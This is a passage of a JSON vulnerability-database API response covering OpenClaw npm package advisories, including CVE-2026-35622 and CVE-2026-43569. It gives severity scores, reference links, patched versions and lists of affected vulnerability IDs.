                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35622",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35622"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mp66-rf4f-mhh8",
                    "reference_id": "GHSA-mp66-rf4f-mhh8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mp66-rf4f-mhh8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35622",
                "GHSA-mp66-rf4f-mhh8"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aja9-wzp2-kbcj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89095?format=api",
            "vulnerability_id": "VCID-arks-g6hw-abbw",
            "summary": "OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins\n## Summary\n\nWorkspace provider auth choices could auto-enable untrusted provider plugins.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nNon-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup.\n\n## Technical Details\n\nThe fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled.\n\n## Fix\n\nThe issue was fixed in #62368. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d97eae53e212ae26f3aebcd6a50ffc6877f770d`\n- PR: #62368\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00107",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28508",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00116",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29982",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00116",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30011",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43569"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/62368",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/62368"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43569"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-939r-rj45-g2rj",
                    "reference_id": "GHSA-939r-rj45-g2rj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-939r-rj45-g2rj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
